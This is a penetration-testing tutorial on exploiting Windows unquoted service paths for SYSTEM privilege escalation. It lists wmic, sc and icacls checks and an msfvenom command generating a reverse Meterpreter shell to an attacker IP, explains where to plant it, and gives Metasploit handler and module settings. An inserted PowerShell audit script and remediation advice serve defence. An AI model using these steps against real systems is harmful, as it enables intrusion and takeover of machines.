Unquoted Service Paths
Unquoted Service Path vulnerabilities abuse the way Windows searches for a binary when a service is started. They occur when the path to the service binary contains spaces and has not been enclosed in quotation marks, so Windows tries each space-delimited prefix of the path as an executable before it reaches the intended one.
First of all, we need to identify a vulnerable service. We can use automated tools such as jaws.ps1 to do this, but we can do it manually, too. The manual way is to use wmic to list automatically started services, excluding those under C:\Windows and those whose path is already quoted:
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
We will need to make sure that we can stop and start the service as the user we are running as on the victim system. We can do this using:
sc stop VulnService
sc start VulnService
We can check the state of the service using:
sc query VulnService
We also need to make sure that the vulnerable service runs as the SYSTEM account. We can check this by running:
sc qc VulnService
and looking at the SERVICE_START_NAME field, which will hopefully show LocalSystem.
Next, we need to stop the service and then check the permissions of the target directory, the one into which we aim to upload our malicious executable. To do this, we can navigate to the parent directory of the target directory and run:
icacls VulnDirectory
We are looking for the ability to write to the directory or to modify it, so we hope to see (M) for modify or (W) for write against our user or a group we belong to.
Our task is to upload malware into the unquoted service path at a location which Windows will search before it finds the legitimate executable for the service. The malware will depend on the context of the compromised machine, but a simple example would be a reverse Meterpreter shell generated using msfvenom:
sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.8.46.6 LPORT=4445 --platform Windows -f exe > Vuln.exe
Assuming that we can write to the target directory, we can now upload our malware into the service's path and give it the name that Windows will try to execute when the service starts. When working out where to place the malware, we look at where the spaces fall in the unquoted service path. Here is an example:
C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe
In this example, we could try to place our malware at the following path:
C:\Program Files\VMware\VMware.exe
Here is another example of an unquoted service path:
C:\Program Files (x86)\Canon\IJ Scan Utility\SETEVENT.exe
We could try to place our malware at the following path:
C:\Program Files (x86)\Canon\IJ.exe
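The identification step (the wmic one-liner), the icacls permission check and the space-splitting logic for working out which truncated paths Windows will try can be combined into a single audit. The following PowerShell script is an added example and is not part of the original page or of any tool it mentions: it enumerates services whose binary path is unquoted and contains spaces, derives each truncated path Windows would probe before the real executable, and reports those whose parent directory grants create/write rights to broad principals. The $BroadPrincipals list and the function names are assumptions made for this example; the cmdlets and .NET types used are standard.

```powershell
# Added audit script, not from the original page. Lists services whose binary path
# is unquoted and contains spaces, derives each truncated path Windows would try
# before the real executable (e.g. "C:\Program Files\VMware\VMware.exe"), and
# reports the ones whose parent directory grants create/write rights to a broad
# principal. $BroadPrincipals is an assumed list; extend it for your environment.
$BroadPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Services whose PathName is not wrapped in quotes yet contains at least one space.
function Get-UnquotedServicePath {
    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.PathName -and $_.PathName -notmatch '^\s*"' -and $_.PathName -match '\s' }
}

# The executable part of a PathName: everything up to and including the first ".exe",
# so trailing service arguments such as "-k netsvcs" are dropped (-match is
# case-insensitive by default in PowerShell).
function Get-ServiceExecutable {
    param([string]$PathName)
    if ($PathName -match '^(.*?\.exe)') { return $Matches[1] }
    return $null
}

# Each space-delimited prefix of an unquoted path is what CreateProcess would try
# first: "C:\Program Files\Foo Bar\svc.exe" yields C:\Program.exe and
# C:\Program Files\Foo.exe, each paired with the directory it would live in.
function Get-SearchCandidate {
    param([string]$ExePath)
    $parts = $ExePath -split ' '
    for ($i = 1; $i -lt $parts.Count; $i++) {
        $prefix = $parts[0..($i - 1)] -join ' '
        [pscustomobject]@{
            Candidate = "$prefix.exe"
            Directory = Split-Path -Path $prefix -Parent
        }
    }
}

# True when an Allow ACE for a broad principal that applies to the directory itself
# carries the CreateFiles (WriteData) bit, which Modify and FullControl include, or a
# generic write/all right (generic rights show up as raw bits outside the enum names).
function Test-BroadWriteAccess {
    param([string]$Directory)
    if (-not (Test-Path -LiteralPath $Directory -PathType Container)) { return $false }
    $createFiles       = [int][System.Security.AccessControl.FileSystemRights]::CreateFiles
    $inheritOnly       = [int][System.Security.AccessControl.PropagationFlags]::InheritOnly
    $genericWriteOrAll = 0x40000000 -bor 0x10000000   # GENERIC_WRITE | GENERIC_ALL
    foreach ($ace in (Get-Acl -LiteralPath $Directory).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($BroadPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        # An InheritOnly ACE governs children, not this directory.
        if (([int]$ace.PropagationFlags -band $inheritOnly) -ne 0) { continue }
        $rights = [int]$ace.FileSystemRights
        if ((($rights -band $createFiles) -ne 0) -or (($rights -band $genericWriteOrAll) -ne 0)) {
            return $true
        }
    }
    return $false
}

# One row per (service, writable directory) pair; an empty result means no finding.
function Find-WritableUnquotedServicePath {
    foreach ($svc in Get-UnquotedServicePath) {
        $exe = Get-ServiceExecutable -PathName $svc.PathName
        if (-not $exe) { continue }
        foreach ($c in Get-SearchCandidate -ExePath $exe) {
            if (Test-BroadWriteAccess -Directory $c.Directory) {
                [pscustomobject]@{
                    Service      = $svc.Name
                    StartMode    = $svc.StartMode
                    RunsAs       = $svc.StartName
                    WritableDir  = $c.Directory
                    WouldExecute = $c.Candidate
                }
            }
        }
    }
}

Find-WritableUnquotedServicePath | Format-Table -AutoSize
```

Run it in an elevated PowerShell session so that every directory ACL can be read. Each row names the service, its start mode, the account it runs as (LocalSystem being the case the page is after), the writable directory and the file name Windows would execute from it before reaching the real binary. The remediation for any hit is to quote the path in the service configuration, for example sc config VulnService binPath= "\"C:\Program Files\Vuln Service\VulnService.exe\"" (the space after binPath= is required by sc), and to remove the broad write right from the directory.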
We can now start a handler before starting the service on the victim machine. The shell may be unstable, so we can have it migrate to a different process as soon as it connects by configuring the handler before running it:
set AutoRunScript migrate -n svchost.exe
We could also use:
set AutoRunScript migrate -f
to spawn a new notepad process which will be migrated to automatically.
msfconsole also has a module we can use to automatically exploit unquoted service paths:
use exploit/windows/local/trusted_service_path